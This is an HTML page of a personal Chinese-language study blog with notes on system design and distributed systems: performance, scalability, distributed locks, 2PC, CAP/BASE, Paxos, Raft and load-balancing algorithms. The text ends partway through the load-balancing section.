<!DOCTYPE html>
<html lang="java">


<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, user-scalable=no">
  <title>
    系统设计 | Guoer03的学习笔记
  </title>
  <meta name="description" content="java后端，人工智能">
  
  <meta name="keywords" content="
  java相关,系统设计,分布式
  ">
  
  <meta name="author" content="Arthur Ming">

  <meta http-equiv="Cache-Control" content="no-transform"/>
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="theme-color" content="#1e2327">
  <link rel="apple-touch-icon" href="https://github.githubassets.com/apple-touch-icon.png">
  <link rel="apple-touch-icon" sizes="180x180" href="https://github.githubassets.com/apple-touch-icon-180x180.png">

  <link rel="icon" type="image/x-icon" href="https://github.githubassets.com/favicon.ico">
  <link rel="stylesheet" href="/css/main.css">
  <link rel="stylesheet"
        href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  

  
<script>
  var _hmt = _hmt || [];
  (function(){var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?da1244bec06fb5dc130b39323aef4a2f";
    var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();
</script>


  <script src="//cdnjs.cloudflare.com/ajax/libs/vue/1.0.25-csp/vue.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.11.2/moment.min.js"></script>
<meta name="generator" content="Hexo 4.2.1"></head>

<body id="replica-app">

<nav class="navbar-wrapper">
  <div class="navbar">
    <div class="container clearfix">
      <a href="/" class="navbar-logo"><i class="fa fa-github"></i></a>

      <div class="navbar-search float-left desktop-only">
        <div class="navbar-search-form">
          <label for="gsc-i-id1">This website</label>
          <div id="google-search">
            <gcse:search></gcse:search>
          </div>
        </div>
      </div>

      <ul class="navbar-nav float-left">
        
        <li><a href="/archives">Archives</a></li>
        
        
        <li><a href="/categories">Categories</a></li>
        
        
        <li><a href="/tags">Tags</a></li>
        
        
        <li class="desktop-only"><a href="/atom.xml" target="_blank">RSS</a></li>
        
      </ul>

      <ul class="navbar-nav user-nav float-right desktop-only">
        <li class="user-nav-notification">
          <a><span class="user-nav-unread"></span><i class="fa fa-bell"></i></a>
        </li>
        <li>
          <a><i class="fa fa-plus"></i> <i class="fa fa-caret-down"></i></a>
        </li>
        <li class="user-nav-logo">
          <a><img src="/images/header.jpg"> <i class="fa fa-caret-down"></i></i></a>
        </li>
      </ul>
    </div>
  </div>
</nav>

<div class="main-container">
  <header class="header-wrapper desktop-only">
  <div class="container header-site-detail">
    <ul class="header-toolbar">
      <li class="clearfix">
        <a href="/archives" class="header-toolbar-left"><i
                  class="fa fa-file-text"></i> Posts </a>
        <a href="/archives"
           class="header-toolbar-right"> 6 </a>
      </li>
      <li>
        <a href="/tags" class="header-toolbar-left"><i
                  class="fa fa-tags"></i> Tags </a>
        <a href="/tags"
           class="header-toolbar-right"> 10 </a>
      </li>
      <li>
        <a href="/categories" class="header-toolbar-left"><i
                  class="fa fa-folder-open"></i> Categories </a>
        <a href="/categories"
           class="header-toolbar-right"> 0 </a>
      </li>
    </ul>
    <h2 class="header-title">
      <i class="fa fa-book text-muted"></i>
      <a href="/">Guoer03的学习笔记</a>
      
      
    </h2>
  </div>

  <div class="container">
    <div class="header-tab-wrapper clearfix">
      <span class="header-tab header-tab-selected"><i class="fa fa-thumbs-o-up"></i> Like</span>
      <span class="header-tab"><i class="fa fa-share-alt"></i> Share</span>
      <span class="header-tab"><i class="fa fa-comments-o"></i> Discussion</span>
      <span class="header-tab"><i class="fa fa-bookmark-o"></i> Bookmark </span>
      <span class="header-tab"><i class="fa fa-smile-o"></i> Smile <i class="fa fa-caret-down"></i></span>
    </div>
  </div>
</header>


<div class="post-container container">
  <h3>
    <i class="fa fa-user-o"></i>
    Arthur Ming

    <span class="post-date float-right" title="{{moment(1593168639000).format('MMM DD, YYYY, h:mm:ss A')}}">
      
          <i class="fa fa-pencil-square-o"></i>
      
      {{moment(1593168639000).fromNow()}}
    </span>
  </h3>

  <article class="post-content">
    <h1>系统设计</h1>
    <br>  

<h1 id="系统设计基础"><a href="#系统设计基础" class="headerlink" title="系统设计基础"></a>系统设计基础</h1><h2 id="一-性能"><a href="#一-性能" class="headerlink" title="一.性能"></a>一.性能</h2><h3 id="性能指标"><a href="#性能指标" class="headerlink" title="性能指标"></a>性能指标</h3><p><strong>1. 响应时间</strong><br>指某个请求从发出到接收到响应消耗的时间。<br>在对响应时间进行测试时，通常采用重复请求的方式，然后计算平均响应时间。  </p>
<p><strong>2. 吞吐量</strong><br>指系统在单位时间内可以处理的请求数量，通常使用每秒的请求数来衡量。  </p>
<p><strong>3. 并发用户数</strong><br>指系统能同时处理的并发用户请求数量。  </p>
<h3 id="性能优化"><a href="#性能优化" class="headerlink" title="性能优化"></a>性能优化</h3><ol>
<li><p><strong>集群</strong><br>将多台服务器组成集群，使用负载均衡将请求转发到集群中，避免单一服务器的负载压力过大导致性能降低。  </p>
</li>
<li><p><strong>缓存</strong><br>缓存能够提高性能的原因如下：  </p>
<ul>
<li>缓存数据通常位于内存等介质中，这种介质对于读操作特别快；</li>
<li>缓存数据可以位于靠近用户的地理位置上；  </li>
<li>可以将计算结果进行缓存，从而避免重复计算。   </li>
</ul>
</li>
<li><p><strong>异步</strong><br>某些流程可以将操作转换为消息，将消息发送到消息队列之后立即返回，之后这个操作会被异步处理。  </p>
</li>
</ol>
<h2 id="二、伸缩性"><a href="#二、伸缩性" class="headerlink" title="二、伸缩性"></a>二、伸缩性</h2><blockquote>
<p>指不断向集群中添加服务器来缓解不断上升的用户并发访问压力和不断增长的数据存储需求  </p>
</blockquote>
<h3 id="伸缩性与性能"><a href="#伸缩性与性能" class="headerlink" title="伸缩性与性能"></a>伸缩性与性能</h3><p>如果系统存在性能问题，那么单个用户的请求总是很慢的；<br>如果系统存在伸缩性问题，那么单个用户的请求可能会很快，但是在并发数很高的情况下系统会很慢。</p>
<h3 id="实现伸缩性"><a href="#实现伸缩性" class="headerlink" title="实现伸缩性"></a>实现伸缩性</h3><p>应用服务器只要不具有状态，那么就可以很容易地通过负载均衡器向集群中添加新的服务器。<br>关系型数据库的伸缩性通过 Sharding 来实现，将数据按一定的规则分布到不同的节点上，从而解决单台存储服务器的存储空间限制。<br>对于非关系型数据库，它们天生就是为海量数据而诞生，对伸缩性的支持特别好。   </p>
<h2 id="三、扩展性"><a href="#三、扩展性" class="headerlink" title="三、扩展性"></a>三、扩展性</h2><blockquote>
<p>指的是添加新功能时对现有系统的其它应用无影响，这就要求不同应用具备低耦合的特点。  </p>
</blockquote>
<p>实现可扩展主要有两种方式：</p>
<ul>
<li>使用消息队列进行解耦，应用之间通过消息传递进行通信；</li>
<li>使用分布式服务将业务和可复用的服务分离开来，业务使用分布式服务框架调用可复用的服务。新增的产品可以通过调用可复用的服务来实现业务逻辑，对其它产品没有影响。  </li>
</ul>
<h2 id="四、可用性"><a href="#四、可用性" class="headerlink" title="四、可用性"></a>四、可用性</h2><h3 id="冗余"><a href="#冗余" class="headerlink" title="冗余"></a>冗余</h3><p>保证高可用的主要手段是使用冗余，当某个服务器故障时就请求其它服务器。<br>应用服务器的冗余比较容易实现，只要保证应用服务器不具有状态，那么某个应用服务器故障时，负载均衡器将该应用服务器原先的用户请求转发到另一个应用服务器上，不会对用户有任何影响。<br>存储服务器的冗余需要使用主从复制来实现，当主服务器故障时，需要提升从服务器为主服务器，这个过程称为切换。  </p>
<h3 id="监控"><a href="#监控" class="headerlink" title="监控"></a>监控</h3><p>对 CPU、内存、磁盘、网络等系统负载信息进行监控，当某个信息达到一定阈值时通知运维人员，从而在系统发生<br>故障之前及时发现问题。  </p>
<h3 id="服务降级"><a href="#服务降级" class="headerlink" title="服务降级"></a>服务降级</h3><p>服务降级是系统为了应对大量的请求，主动关闭部分功能，从而保证核心功能可用  </p>
<h2 id="五、安全性"><a href="#五、安全性" class="headerlink" title="五、安全性"></a>五、安全性</h2><blockquote>
<p>要求系统在应对各种攻击手段时能够有可靠的应对措施</p>
</blockquote>
<h1 id="分布式"><a href="#分布式" class="headerlink" title="分布式"></a>分布式</h1><h2 id="一、分布式锁"><a href="#一、分布式锁" class="headerlink" title="一、分布式锁"></a>一、分布式锁</h2><blockquote>
<p>阻塞锁通常使用互斥量来实现：<br>互斥量为 0 表示有其它进程在使用锁，此时处于锁定状态；<br>互斥量为 1 表示未锁定状态。</p>
</blockquote>
<h3 id="数据库的唯一索引"><a href="#数据库的唯一索引" class="headerlink" title="数据库的唯一索引"></a>数据库的唯一索引</h3><blockquote>
<p>获得锁时向表中插入一条记录，释放锁时删除这条记录。唯一索引可以保证该记录只被插入一次，那么就可以用这个<br>记录是否存在来判断是否存于锁定状态。  </p>
</blockquote>
<p>存在以下几个问题：  </p>
<ul>
<li>锁没有失效时间，解锁失败的话其它进程无法再获得该锁。  </li>
<li>只能是非阻塞锁，插入失败直接就报错了，无法重试。 </li>
<li>不可重入，已经获得锁的进程也必须重新获取锁。</li>
</ul>
<h3 id="Redis-的-SETNX-指令"><a href="#Redis-的-SETNX-指令" class="headerlink" title="Redis 的 SETNX 指令"></a>Redis 的 SETNX 指令</h3><blockquote>
<p>使用 SETNX（set if not exist）指令插入一个键值对，如果 Key 已经存在，那么会返回 False，否则插入成功并返回<br>True。</p>
</blockquote>
<p>SETNX 指令和数据库的唯一索引类似，保证了只存在一个 Key 的键值对，那么可以用一个 Key 的键值对是否存在来<br>判断是否存于锁定状态。  </p>
<p>EXPIRE 指令可以为一个键值对设置一个过期时间，从而避免了数据库唯一索引实现方式中释放锁失败的问题。  </p>
<h3 id="Redis-的-RedLock-算法"><a href="#Redis-的-RedLock-算法" class="headerlink" title="Redis 的 RedLock 算法"></a>Redis 的 RedLock 算法</h3><blockquote>
<p>使用了多个 Redis 实例来实现分布式锁，这是为了保证在发生单点故障时仍然可用。</p>
</blockquote>
<ul>
<li>尝试从 N 个互相独立 Redis 实例获取锁；</li>
<li>计算获取锁消耗的时间，只有当这个时间小于锁的过期时间，并且从大多数（N / 2 + 1）实例上获取了锁，那么就认为锁获取成功了；</li>
<li>如果锁获取失败，就到每个实例上释放锁。  </li>
</ul>
<h3 id="Zookeeper-的有序节点"><a href="#Zookeeper-的有序节点" class="headerlink" title="Zookeeper 的有序节点"></a>Zookeeper 的有序节点</h3><p><strong>1. Zookeeper 抽象模型</strong><br>Zookeeper 提供了一种树形结构的命名空间，/app1/p_1 节点的父节点为 /app1。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593864833(1).png" alt="">  </p>
<p><strong>2. 节点类型</strong>  </p>
<ul>
<li>永久节点：不会因为会话结束或者超时而消失；</li>
<li>临时节点：如果会话结束或者超时就会消失；</li>
<li>有序节点：会在节点名的后面加一个数字后缀，并且是有序的，例如生成的有序节点为 /lock/node-</li>
<li>0000000000，它的下一个有序节点则为 /lock/node-0000000001，以此类推。  </li>
</ul>
<p><strong>3. 监听器</strong>  </p>
<blockquote>
<p>为一个节点注册监听器，在节点状态发生改变时，会给客户端发送消息。  </p>
</blockquote>
<p><strong>4. 分布式锁实现</strong>  </p>
<ul>
<li>创建一个锁目录 /lock；</li>
<li>当一个客户端需要获取锁时，在 /lock 下创建临时的且有序的子节点；</li>
<li>客户端获取 /lock 下的子节点列表，判断自己创建的子节点是否为当前子节点列表中序号最小的子节点，如果是</li>
<li>则认为获得锁；否则监听自己的前一个子节点，获得子节点的变更通知后重复此步骤直至获得锁；</li>
<li>执行业务代码，完成后，删除对应的子节点。</li>
</ul>
<p><strong>5. 会话超时</strong><br>如果一个已经获得锁的会话超时了，因为创建的是临时节点，所以该会话对应的临时节点会被删除，其它会话就可以<br>获得锁了。可以看到，Zookeeper 分布式锁不会出现数据库的唯一索引实现的分布式锁释放锁失败问题。<br><strong>6. 羊群效应</strong><br>一个节点未获得锁，只需要监听自己的前一个子节点，这是因为如果监听所有的子节点，那么任意一个子节点状态改<br>变，其它所有子节点都会收到通知（羊群效应），而我们只希望它的后一个子节点收到通知。  </p>
<h2 id="二、分布式事务"><a href="#二、分布式事务" class="headerlink" title="二、分布式事务"></a>二、分布式事务</h2><blockquote>
<p>指事务的操作位于不同的节点上，需要保证事务的 ACID 特性。</p>
</blockquote>
<h3 id="2PC"><a href="#2PC" class="headerlink" title="2PC"></a>2PC</h3><p>两阶段提交（Two-phase Commit，2PC），通过引入协调者（Coordinator）来协调参与者的行为，并最终决定这<br>些参与者是否要真正执行事务。</p>
<p><strong>1. 运行过程</strong><br>1.1 准备阶段  </p>
<blockquote>
<p>协调者询问参与者事务是否执行成功，参与者发回事务执行结果。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593869060(1).png" alt=""></p>
</blockquote>
<p>1.2 提交阶段<br>如果事务在每个参与者上都执行成功，事务协调者发送通知让参与者提交事务；否则，协调者发送通知让参与者回滚<br>事务。<br>需要注意的是，在准备阶段，参与者执行了事务，但是还未提交。只有在提交阶段接收到协调者发来的通知后，才进<br>行提交或者回滚<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593869119(1).png" alt="">  </p>
<p><strong>2. 存在的问题</strong><br><strong>2.1 同步阻塞</strong><br>所有事务参与者在等待其它参与者响应的时候都处于同步阻塞状态，无法进行其它操作。<br><strong>2.2 单点问题</strong><br>协调者在 2PC 中起到非常大的作用，发生故障将会造成很大影响。特别是在阶段二发生故障，所有参与者会一直等<br>待，无法完成其它操作。<br><strong>2.3 数据不一致</strong><br>在阶段二，如果协调者只发送了部分 Commit 消息，此时网络发生异常，那么只有部分参与者接收到 Commit 消<br>息，也就是说只有部分参与者提交了事务，使得系统数据不一致。<br><strong>2.4 太过保守</strong><br>任意一个节点失败就会导致整个事务失败，没有完善的容错机制。  </p>
<h3 id="本地消息表"><a href="#本地消息表" class="headerlink" title="本地消息表"></a>本地消息表</h3><p>本地消息表与业务数据表处于同一个数据库中，这样就能利用本地事务来保证在对这两个表的操作满足事务特性，并且使用了消息队列来保证最终一致性。  </p>
<ol>
<li>在分布式事务操作的一方完成写业务数据的操作之后向本地消息表发送一个消息，本地事务能保证这个消息一<br>定会被写入本地消息表中。  </li>
<li>之后将本地消息表中的消息转发到消息队列中，如果转发成功则将消息从本地消息表中删除，否则继续重新转<br>发。  </li>
<li>在分布式事务操作的另一方从消息队列中读取一个消息，并执行消息中的操作。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593869231(1).png" alt="">  </li>
</ol>
<h2 id="三、CAP"><a href="#三、CAP" class="headerlink" title="三、CAP"></a>三、CAP</h2><p>分布式系统不可能同时满足一致性（C：Consistency）、可用性（A：Availability）和分区容忍性（P：Partition<br>Tolerance），最多只能同时满足其中两项。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593869277(1).png" alt="">  </p>
<h3 id="一致性"><a href="#一致性" class="headerlink" title="一致性"></a>一致性</h3><blockquote>
<p>一致性指的是多个数据副本是否能保持一致的特性，在一致性的条件下，系统在执行数据更新操作之后能够从一致性<br>状态转移到另一个一致性状态。</p>
</blockquote>
<p>对系统的一个数据更新成功之后，如果所有用户都能够读取到最新的值，该系统就被认为具有强一致性。</p>
<h3 id="可用性"><a href="#可用性" class="headerlink" title="可用性"></a>可用性</h3><blockquote>
<p>可用性指分布式系统在面对各种异常时可以提供正常服务的能力，可以用系统可用时间占总时间的比值来衡量，4 个<br>9 的可用性表示系统 99.99% 的时间是可用的。</p>
</blockquote>
<p>在可用性条件下，要求系统提供的服务一直处于可用的状态，对于用户的每一个操作请求总是能够在有限的时间内返<br>回结果。  </p>
<h3 id="分区容忍性"><a href="#分区容忍性" class="headerlink" title="分区容忍性"></a>分区容忍性</h3><blockquote>
<p>网络分区指分布式系统中的节点被划分为多个区域，每个区域内部可以通信，但是区域之间无法通信。</p>
</blockquote>
<p>在分区容忍性条件下，分布式系统在遇到任何网络分区故障的时候，仍然需要能对外提供一致性和可用性的服务，除<br>非是整个网络环境都发生了故障。  </p>
<h3 id="权衡"><a href="#权衡" class="headerlink" title="权衡"></a>权衡</h3><p>在分布式系统中，分区容忍性必不可少，因为需要总是假设网络是不可靠的。因此，CAP 理论实际上是要在可用性和一致性之间做权衡。 </p>
<p>可用性和一致性往往是冲突的，很难使它们同时满足。在多个节点之间进行数据同步时，  </p>
<ul>
<li>为了保证一致性（CP），不能访问未同步完成的节点，也就失去了部分可用性；  </li>
<li>为了保证可用性（AP），允许读取所有节点的数据，但是数据可能不一致。  </li>
</ul>
<h2 id="四、BASE"><a href="#四、BASE" class="headerlink" title="四、BASE"></a>四、BASE</h2><p>BASE 是<strong>基本可用</strong>（Basically Available）、<strong>软状态</strong>（Soft State）和<strong>最终一致性</strong>（Eventually Consistent）三个短语的缩写。  </p>
<p>BASE 理论是对 CAP 中一致性和可用性权衡的结果，它的核心思想是：即使无法做到强一致性，但每个应用都可以根据自身业务特点，采用适当的方式来使系统达到最终一致性。  </p>
<h3 id="基本可用"><a href="#基本可用" class="headerlink" title="基本可用"></a>基本可用</h3><p>指<strong>分布式系统在出现故障的时候，保证核心可用，允许损失部分可用性。</strong><br>例如，电商在做促销时，为了保证购物系统的稳定性，部分消费者可能会被引导到一个降级的页面。</p>
<h3 id="软状态"><a href="#软状态" class="headerlink" title="软状态"></a>软状态</h3><p>指允许系统中的数据存在中间状态，并认为该中间状态不会影响系统整体可用性，即<strong>允许系统不同节点的数据副本之<br>间进行同步的过程存在时延。</strong></p>
<h3 id="最终一致性"><a href="#最终一致性" class="headerlink" title="最终一致性"></a>最终一致性</h3><p><strong>最终一致性强调的是系统中所有的数据副本，在经过一段时间的同步后，最终能达到一致的状态。</strong><br>ACID 要求强一致性，通常运用在传统的数据库系统上。而 BASE 要求最终一致性，通过牺牲强一致性来达到可用<br>性，通常运用在大型分布式系统中。<br>在实际的分布式场景中，不同业务单元和组件对一致性的要求是不同的，因此 ACID 和 BASE 往往会结合在一起使<br>用。  </p>
<h2 id="五、Paxos"><a href="#五、Paxos" class="headerlink" title="五、Paxos"></a>五、Paxos</h2><blockquote>
<p>自Paxos问世以来就持续垄断了分布式一致性算法，Paxos这个名词几乎等同于分布式一致性。  </p>
</blockquote>
<p>用于达成共识性问题，即对多个节点产生的值，该算法能保证只选出唯一一个值。<br>主要有三类节点：</p>
<ul>
<li><strong>提议者（Proposer）</strong>：提出提案 (Proposal)。Proposal信息包括提案编号 (Proposal ID) 和提议的值 (Value)。</li>
<li><strong>接受者（Acceptor）</strong>：参与决策，回应Proposers的提案。收到Proposal后可以接受提案，若Proposal获得多数Acceptors的接受，则称该Proposal被批准。</li>
<li><strong>告知者（Learner）</strong>：不参与决策，从Proposers/Acceptors学习最新达成一致的提案（Value）。</li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593869573(1).png" alt=""></p>
<h3 id="执行过程"><a href="#执行过程" class="headerlink" title="执行过程"></a>执行过程</h3><p>规定一个提议包含两个字段：[n, v]，其中 n 为序号（具有唯一性），v 为提议值。<br><strong>1. Prepare 阶段</strong>  </p>
<p>下图演示了两个 Proposer 和三个 Acceptor 的系统中运行该算法的初始过程，每个 Proposer 都会向所有 Acceptor<br>发送 Prepare 请求。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593875281(1).png" alt=""><br>当 Acceptor 接收到一个 Prepare 请求，包含的提议为 [n1, v1]，并且之前还未接收过 Prepare 请求，那么发送一个Prepare 响应，设置当前接收到的提议为 [n1, v1]，并且保证以后不会再接受序号小于 n1 的提议。  </p>
<p>如下图，Acceptor X 在收到 [n=2, v=8] 的 Prepare 请求时，由于之前没有接收过提议，因此就发送一个 [noprevious] 的 Prepare 响应，设置当前接收到的提议为 [n=2, v=8]，并且保证以后不会再接受序号小于 2 的提议。其它的 Acceptor 类似。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593875355(1).png" alt=""><br>如果 Acceptor 接收到一个 Prepare 请求，包含的提议为 [n2, v2]，并且之前已经接收过提议 [n1, v1]。如果 n1 &gt;n2，那么就丢弃该提议请求；否则，发送 Prepare 响应，该 Prepare 响应包含之前已经接收过的提议 [n1, v1]，设置当前接收到的提议为 [n2, v2]，并且保证以后不会再接受序号小于 n2 的提议。  </p>
<p>如下图，Acceptor Z 收到 Proposer A 发来的 [n=2, v=8] 的 Prepare 请求，由于之前已经接收过 [n=4, v=5] 的提<br>议，并且 n &gt; 2，因此就抛弃该提议请求；Acceptor X 收到 Proposer B 发来的 [n=4, v=5] 的 Prepare 请求，因为之<br>前接收到的提议为 [n=2, v=8]，并且 2 &lt;= 4，因此就发送 [n=2, v=8] 的 Prepare 响应，设置当前接收到的提议为<br>[n=4, v=5]，并且保证以后不会再接受序号小于 4 的提议。Acceptor Y 类似。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593878822(1).png" alt="">  </p>
<p><strong>2. Accept 阶段</strong>  </p>
<p>当一个 Proposer 接收到超过一半 Acceptor 的 Prepare 响应时，就可以发送 Accept 请求。</p>
<p>Proposer A 接收到两个 Prepare 响应之后，就发送 [n=2, v=8] Accept 请求。该 Accept 请求会被所有 Acceptor 丢弃，因为此时所有 Acceptor 都保证不接受序号小于 4 的提议。</p>
<p>Proposer B 过后也收到了两个 Prepare 响应，因此也开始发送 Accept 请求。需要注意的是，Accept 请求的 v 需要<br>取它收到的最大提议编号对应的 v 值，也就是 8。因此它发送 [n=4, v=8] 的 Accept 请求。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593878822(1).png" alt="">  </p>
<p><strong>3. Learn 阶段</strong></p>
<p>Acceptor 接收到 Accept 请求时，如果序号大于等于该 Acceptor 承诺的最小序号，那么就发送 Learn 提议给所有的Learner。当 Learner 发现有大多数的 Acceptor 接收了某个提议，那么该提议的提议值就被 Paxos 选择出来。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593925534(1).png" alt="">  </p>
<h3 id="约束条件"><a href="#约束条件" class="headerlink" title="约束条件"></a>约束条件</h3><p><strong>1. 正确性</strong></p>
<p>指只有一个提议值会生效。  </p>
<p>因为 Paxos 协议要求每个生效的提议被多数 Acceptor 接收，并且 Acceptor 不会接受两个不同的提议，因此可以保<br>证正确性。  </p>
<p><strong>2. 可终止性</strong></p>
<p>指最后总会有一个提议生效。</p>
<p>Paxos 协议能够让 Proposer 发送的提议朝着能被大多数 Acceptor 接受的那个提议靠拢，因此能够保证可终止性。</p>
<blockquote>
<p>谈谈自己的理解：在一堆服务器中，有一些服务器可能会宕机，那么在其他服务器都更新了很多次值以后，某个服务器它的值还停留在最初始的地方。那么这个proposer发出自己提议的时候，就不能因为它是最新的提议就直接同步所有的值与之相等，就需要用到paxos算法来投票了。</p>
</blockquote>
<blockquote>
<p>具体的每一个阶段的必要性证明：<a href="https://zhuanlan.zhihu.com/p/27829918?utm_source=wechat_session&utm_medium=social&utm_oi=870099841890521088" target="_blank" rel="noopener" title="paxos的必要性证明">https://zhuanlan.zhihu.com/p/27829918?utm_source=wechat_session&amp;utm_medium=social&amp;utm_oi=870099841890521088</a>  </p>
</blockquote>
<h2 id="六、Raft"><a href="#六、Raft" class="headerlink" title="六、Raft"></a>六、Raft</h2><blockquote>
<p>Raft 也是分布式一致性协议，主要是用来竞选主节点。</p>
</blockquote>
<h2 id="单个-Candidate-的竞选"><a href="#单个-Candidate-的竞选" class="headerlink" title="单个 Candidate 的竞选"></a>单个 Candidate 的竞选</h2><p>有三种节点：Follower、Candidate 和 Leader。Leader 会周期性的发送心跳包给 Follower。每个 Follower 都设置<br>了一个随机的竞选超时时间，一般为 150ms~300ms，如果在这个时间内没有收到 Leader 的心跳包，就会变成<br>Candidate，进入竞选阶段。  </p>
<ul>
<li>下图展示一个分布式系统的最初阶段，此时只有 Follower 没有 Leader。Node A 等待一个随机的竞选超时时间之后，没收到 Leader 发来的心跳包，因此进入竞选阶段。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593935770(1).png" alt=""> </li>
</ul>
<ul>
<li><p>此时 Node A 发送投票请求给其它所有节点。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593935840(1).png" alt="">  </p>
</li>
<li><p>其它节点会对请求进行回复，如果超过一半的节点回复了，那么该 Candidate 就会变成 Leader。  </p>
</li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593935884(1).png" alt="">  </p>
<ul>
<li>之后 Leader 会周期性地发送心跳包给 Follower，Follower 接收到心跳包，会重新开始计时。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593935938(1).png" alt="">  </li>
</ul>
<h2 id="多个-Candidate-竞选"><a href="#多个-Candidate-竞选" class="headerlink" title="多个 Candidate 竞选"></a>多个 Candidate 竞选</h2><ul>
<li>如果有多个 Follower 成为 Candidate，并且所获得票数相同，那么就需要重新开始投票。例如下图中 Node B和 Node D 都获得两票，需要重新开始投票。  </li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593936003(1).png" alt="">  </p>
<ul>
<li>由于每个节点设置的随机竞选超时时间不同，因此下一次再次出现多个 Candidate 并获得同样票数的概率很低。  </li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593936050(1).png" alt="">  </p>
<h2 id="数据同步"><a href="#数据同步" class="headerlink" title="数据同步"></a>数据同步</h2><ul>
<li><p>来自客户端的修改都会被传入 Leader。注意该修改还未被提交，只是写入日志中。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593936097(1).png" alt="">  </p>
</li>
<li><p>Leader 会把修改复制到所有 Follower。  </p>
</li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593936326(1).png" alt="">  </p>
<ul>
<li>Leader 会等待大多数的 Follower 也进行了修改，然后才将修改提交。  </li>
</ul>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593936784(1).png" alt="">  </p>
<ul>
<li>此时 Leader 会通知的所有 Follower 让它们也提交修改，此时所有节点的值达成一致。  </li>
<li><img src="https://gitee.com/guoer03/picimg/raw/master/1593936833(1).png" alt="">  </li>
</ul>
<p>更详细的看这个链接：<a href="https://blog.csdn.net/daaikuaichuan/article/details/98627822" target="_blank" rel="noopener">https://blog.csdn.net/daaikuaichuan/article/details/98627822</a><br><br><br><br></p>
<hr>
<h1 id="集群"><a href="#集群" class="headerlink" title="集群"></a>集群</h1><h2 id="一-负载均衡"><a href="#一-负载均衡" class="headerlink" title="一.负载均衡"></a>一.负载均衡</h2><p>集群中的应用服务器（节点）通常被设计成无状态，用户可以请求任何一个节点。</p>
<p>负载均衡器会根据集群中每个节点的负载情况，将用户请求转发到合适的节点上。</p>
<p>负载均衡器可以用来实现高可用以及伸缩性：</p>
<ul>
<li>高可用：当某个节点故障时，负载均衡器会将用户请求转发到另外的节点上，从而保证所有服务持续可用；</li>
<li>伸缩性：算法在处理各种规模的数据时都有很好的性能。随着数据的增大,效率不会下降很快。</li>
</ul>
<p>负载均衡器运行过程包含两个部分：  </p>
<ol>
<li><p>根据负载均衡算法得到转发的节点；  </p>
</li>
<li><p>进行转发</p>
<h3 id="负载均衡算法"><a href="#负载均衡算法" class="headerlink" title="负载均衡算法"></a>负载均衡算法</h3></li>
</ol>
<p><strong>1. 轮询（Round Robin）</strong><br>轮询算法把每个请求轮流发送到每个服务器上。</p>
<p>下图中，一共有 6 个客户端产生了 6 个请求，这 6 个请求按 (1, 2, 3, 4, 5, 6) 的顺序发送。(1, 3, 5) 的请求会被发送到<br>服务器 1，(2, 4, 6) 的请求会被发送到服务器 2。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593937770(1).png" alt=""> </p>
<p>该算法比较适合每个服务器的性能差不多的场景，如果有性能存在差异的情况下，那么性能较差的服务器可能无法承<br>担过大的负载（下图的 Server 2）。  </p>
<p><img src="https://gitee.com/guoer03/picimg/raw/master/1593937822(1).png" alt="">  </p>
<p><strong>2.加权轮询（Weighted Round Robbin）</strong><br>加权轮询是在轮询的基础上，根据服务器的性能差异，为服务器赋予一定的权值，性能高的服务器分配更高的权值。  </p>
<p>例如下图中，服务器 1 被赋予的权值为 5，服务器 2 被赋予的权值为 1，那么 (1, 2, 3, 4, 5) 请求会被发送到服务器<br>1，(6) 请求会被发送到服务器 2。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593938283(1).png" alt=""><br><strong>3. 最少连接（least Connections）</strong><br>由于每个请求的连接时间不一样，使用轮询或者加权轮询算法的话，可能会让一台服务器当前连接数过大，而另一台<br>服务器的连接过小，造成负载不均衡。  </p>
<p>例如下图中，(1, 3, 5) 请求会被发送到服务器 1，但是 (1, 3) 很快就断开连接，此时只有 (5) 请求连接服务器 1；(2, 4,<br>6) 请求被发送到服务器 2，只有 (2) 的连接断开，此时 (6, 4) 请求连接服务器 2。该系统继续运行时，服务器 2 会承<br>担过大的负载。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593938396(1).png" alt=""><br>最少连接算法就是将请求发送给当前最少连接数的服务器上。<br>例如下图中，服务器 1 当前连接数最小，那么新到来的请求 6 就会被发送到服务器 1 上。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593938469(1).png" alt=""><br><strong>4. 加权最少连接（Weighted Least Connection）</strong>  </p>
<p>在最少连接的基础上，根据服务器的性能为每台服务器分配权重，再根据权重计算出每台服务器能处理的连接数。  </p>
<p><strong>5. 随机算法（Random）</strong>  </p>
<p>把请求随机发送到服务器上。<br>和轮询算法类似，该算法比较适合<strong>服务器性能差不多</strong>的场景。<br><img src="https://gitee.com/guoer03/picimg/raw/master/1593938584(1).png" alt=""><br><strong>6. 源地址哈希法 (IP Hash)</strong>  </p>
<p>源地址哈希通过对客户端 IP 计算哈希值之后，再对服务器数量取模得到目标服务器的序号。  </p>
